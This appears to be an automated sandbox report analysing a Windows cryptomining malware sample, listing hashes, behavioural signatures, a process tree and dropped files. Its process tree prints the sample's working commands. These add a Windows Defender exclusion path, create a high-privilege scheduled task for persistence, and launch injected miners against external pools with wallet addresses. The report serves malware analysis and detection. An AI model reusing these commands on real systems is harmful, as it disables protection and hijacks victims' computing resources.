Analysis
-
max time kernel
302s -
max time network
307s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
19-09-2022 10:31
Static task
static1
Behavioral task
behavioral1
Sample
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
Resource
win10-20220901-en
General
-
Target
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
-
Size
862KB
-
MD5
a69b4b080114c6c20c5471ad5613e3bf
-
SHA1
e2bff2d6b4e3742e5f88b54285abe2286742257a
-
SHA256
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c
-
SHA512
c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137
-
SSDEEP
6144:7lwUrVjuSJHQ7ngOzI53XvrxC8e7IDnUc5D8pDF8Z5+ECLsrski+xk30+TeE0Hu0:LVRQgDzxCUFM55sXi/00f70us
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 892 DHUZT.exe 1524 DHUZT.exe -
resource yara_rule behavioral1/memory/1380-106-0x0000000140000000-0x0000000142EFE000-memory.dmp upx behavioral1/memory/1380-108-0x0000000140000000-0x0000000142EFE000-memory.dmp upx behavioral1/memory/1380-109-0x0000000140000000-0x0000000142EFE000-memory.dmp upx behavioral1/memory/1380-111-0x0000000140000000-0x0000000142EFE000-memory.dmp upx -
Loads dropped DLL 1 IoCs
pid Process 2020 cmd.exe -
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 892 set thread context of 724 892 DHUZT.exe 40 PID 892 set thread context of 1380 892 DHUZT.exe 43 PID 1524 set thread context of 724 1524 DHUZT.exe 52 PID 1524 set thread context of 1864 1524 DHUZT.exe 55 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1600 schtasks.exe 1324 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1532 timeout.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2012 powershell.exe 1372 powershell.exe 892 DHUZT.exe 892 DHUZT.exe 1524 DHUZT.exe 1764 powershell.exe 1524 DHUZT.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1700 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 892 DHUZT.exe Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 1524 DHUZT.exe Token: SeDebugPrivilege 1764 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1700 wrote to memory of 2012 1700 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe 28 PID 1700 wrote to memory of 2012 1700 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe 28 PID 1700 wrote to memory of 2012 1700 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe 28 PID 1700 wrote to memory of 2020 1700 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe 30 PID 1700 wrote to memory of 2020 1700 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe 30 PID 1700 wrote to memory of 2020 1700 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe 30 PID 2020 wrote to memory of 1532 2020 cmd.exe 32 PID 2020 wrote to memory of 1532 2020 cmd.exe 32 PID 2020 wrote to memory of 1532 2020 cmd.exe 32 PID 2020 wrote to memory of 892 2020 cmd.exe 33 PID 2020 wrote to memory of 892 2020 cmd.exe 33 PID 2020 wrote to memory of 892 2020 cmd.exe 33 PID 892 wrote to memory of 1372 892 DHUZT.exe 34 PID 892 wrote to memory of 1372 892 DHUZT.exe 34 PID 892 wrote to memory of 1372 892 DHUZT.exe 34 PID 892 wrote to memory of 1916 892 DHUZT.exe 36 PID 892 wrote to memory of 1916 892 DHUZT.exe 36 PID 892 wrote to memory of 1916 892 DHUZT.exe 36 PID 1916 wrote to memory of 1600 1916 cmd.exe 38 PID 1916 wrote to memory of 1600 1916 cmd.exe 38 PID 1916 wrote to memory of 1600 1916 cmd.exe 38 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 892 wrote to memory of 724 892 DHUZT.exe 40 PID 724 wrote to memory of 1756 724 vbc.exe 42 PID 724 wrote to memory of 1756 724 vbc.exe 42 PID 724 wrote to memory of 1756 724 vbc.exe 42 PID 892 wrote to memory of 1380 892 DHUZT.exe 43 PID 892 wrote to memory of 1380 892 DHUZT.exe 43 PID 892 wrote to memory of 1380 892 DHUZT.exe 43 PID 892 wrote to memory of 1380 892 DHUZT.exe 43 PID 892 wrote to memory of 1380 892 DHUZT.exe 43 PID 892 wrote to memory of 1380 892 DHUZT.exe 43 PID 892 wrote to memory of 1380 892 DHUZT.exe 43 PID 1260 wrote to memory of 1524 1260 taskeng.exe 45 PID 1260 wrote to memory of 1524 1260 taskeng.exe 45 PID 1260 wrote to memory of 1524 1260 taskeng.exe 45 PID 1524 wrote to memory of 1764 1524 DHUZT.exe 46 PID 1524 wrote to memory of 1764 1524 DHUZT.exe 46 PID 1524 wrote to memory of 1764 1524 DHUZT.exe 46 PID 1524 wrote to memory of 1628 1524 DHUZT.exe 48 PID 1524 wrote to memory of 1628 1524 DHUZT.exe 48 PID 1524 wrote to memory of 1628 1524 DHUZT.exe 48 PID 1628 wrote to memory of 1324 1628 cmd.exe 50 PID 1628 wrote to memory of 1324 1628 cmd.exe 50 PID 1628 wrote to memory of 1324 1628 cmd.exe 50 PID 1524 wrote to memory of 724 1524 DHUZT.exe 52 PID 1524 wrote to memory of 724 1524 DHUZT.exe 52 PID 1524 wrote to memory of 724 1524 DHUZT.exe 52 PID 1524 wrote to memory of 724 1524 DHUZT.exe 52 PID 1524 wrote to memory of 724 1524 DHUZT.exe 52 PID 1524 wrote to memory of 724 1524 DHUZT.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe"C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp56E.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:1532
-
-
C:\ProgramData\ccl\DHUZT.exe"C:\ProgramData\ccl\DHUZT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"5⤵
- Creates scheduled task(s)
PID:1600
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 74⤵
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:1756
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --user t1fd8D4s9ZYr87E5HaqJJehhTWq5G4A5X2z.APOCALYPSE --port 2001 --pool us-flux.fluxpools.net --pass x --coin flux4⤵PID:1380
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8F03AC33-66BD-407E-B19D-DBC5D2CE6D0D} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\ProgramData\ccl\DHUZT.exeC:\ProgramData\ccl\DHUZT.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"4⤵
- Creates scheduled task(s)
PID:1324
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 73⤵PID:724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:1808
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --user t1fd8D4s9ZYr87E5HaqJJehhTWq5G4A5X2z.APOCALYPSE --port 2001 --pool us-flux.fluxpools.net --pass x --coin flux3⤵PID:1864
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.5MB
MD5615fa272b82e4fd059683972258e3f46
SHA16f897ce43f3683f363b5b57361a1f1961e98c265
SHA2560de21ad041e22932f1bc59b14ee2f1d2323b7de6ae38e7525cd4fec462250154
SHA5120301cace98c25dcb066134f3cf7ff56f3b8b4ce2ffcb887c8789938e6b4c20510b81e12d707d4d03e2d56a6befab5bc5adea184a2532c9bd97d6921e90c15060
-
Filesize
862KB
MD5a69b4b080114c6c20c5471ad5613e3bf
SHA1e2bff2d6b4e3742e5f88b54285abe2286742257a
SHA256cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c
SHA512c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137
-
Filesize
862KB
MD5a69b4b080114c6c20c5471ad5613e3bf
SHA1e2bff2d6b4e3742e5f88b54285abe2286742257a
SHA256cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c
SHA512c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137
-
Filesize
862KB
MD5a69b4b080114c6c20c5471ad5613e3bf
SHA1e2bff2d6b4e3742e5f88b54285abe2286742257a
SHA256cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c
SHA512c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137
-
Filesize
654KB
MD5a5b3b8fa07fdff608c76d4d2463e1793
SHA18ac85a5afecace98377a2e33ab8c046e01ed74db
SHA256a4748fb90784b7606071bd242fe97a86b091e049018bb162c4c7b0fd591f5492
SHA512b96654f1df3ffec423b4bb699544958d0dd1bd2a30e70e04bf1f0bb7bbf1dd5e25dd0cee9d65ea35f0cffdb77a489ba5356f9156e2a77328fa7e8480d6ef0302
-
Filesize
136B
MD52e88e9972deecde25a973a02eb03f594
SHA12cfd6ac2ed2703ebc65f3daca73664c4357e0ee5
SHA256bf18cbd556a8e1700fe154468628931dead4d6f60d4917f0581bce338c868dc2
SHA512cc004bf8977ab5ad9214db0f8477e66bed181d1e1a607a6b6c10fbec122b224b269500fef7c85c5849bc325810a98181ea9a7fdcfea4d8a32c3ac4728ff42855
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d161f271719f4be4f463594af3f2a139
SHA1748ce6dff0b051ec6448a8fd3e527c1db85aa172
SHA256ae3aa380bf6da244ba087b3292774a11fea7d1c539839dc0c02af86ad01c1c3d
SHA512d631b038dc7b90d74a686a727abac2b66fabcdf458e3fc981b1c6de861c48c080a7974892ce814782a1869a05fceb9bcd60ed74d5308603a1a1ff664d3b6ea4b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d161f271719f4be4f463594af3f2a139
SHA1748ce6dff0b051ec6448a8fd3e527c1db85aa172
SHA256ae3aa380bf6da244ba087b3292774a11fea7d1c539839dc0c02af86ad01c1c3d
SHA512d631b038dc7b90d74a686a727abac2b66fabcdf458e3fc981b1c6de861c48c080a7974892ce814782a1869a05fceb9bcd60ed74d5308603a1a1ff664d3b6ea4b
-
Filesize
862KB
MD5a69b4b080114c6c20c5471ad5613e3bf
SHA1e2bff2d6b4e3742e5f88b54285abe2286742257a
SHA256cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c
SHA512c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137